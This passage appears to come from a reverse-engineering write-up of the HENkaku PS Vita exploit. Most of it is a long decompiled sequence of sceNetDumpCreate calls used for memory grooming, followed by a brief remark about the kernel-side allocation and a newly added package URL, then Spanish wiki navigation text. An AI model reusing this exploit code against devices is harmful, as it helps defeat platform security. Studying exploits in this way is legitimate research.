sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B0000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AFA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AF000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AED00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AEA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AE000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ADA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AD000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ACA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AC000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000ABA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AB000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AAA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000AA000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A9000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A8000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A7000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A6000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A5000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A4000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A3000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A2000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A1000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x00001000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x00001000, 0x00000000);

// Old code ...


This suggests more memory is now allocated for the kernel side of the exploit. The encrypted/obfsucated chunk was modified and a new string was added: "http://go.henkaku.xyz/pkg"


To be continued...

~ H.

TOCA AQUÍ PARA SALTAR EL WIKI

Esta es la excepción al aviso "importante" del principio, sirve para bajar hasta el fondo del wiki y saltar "Ingeniería inversa a Henkaku"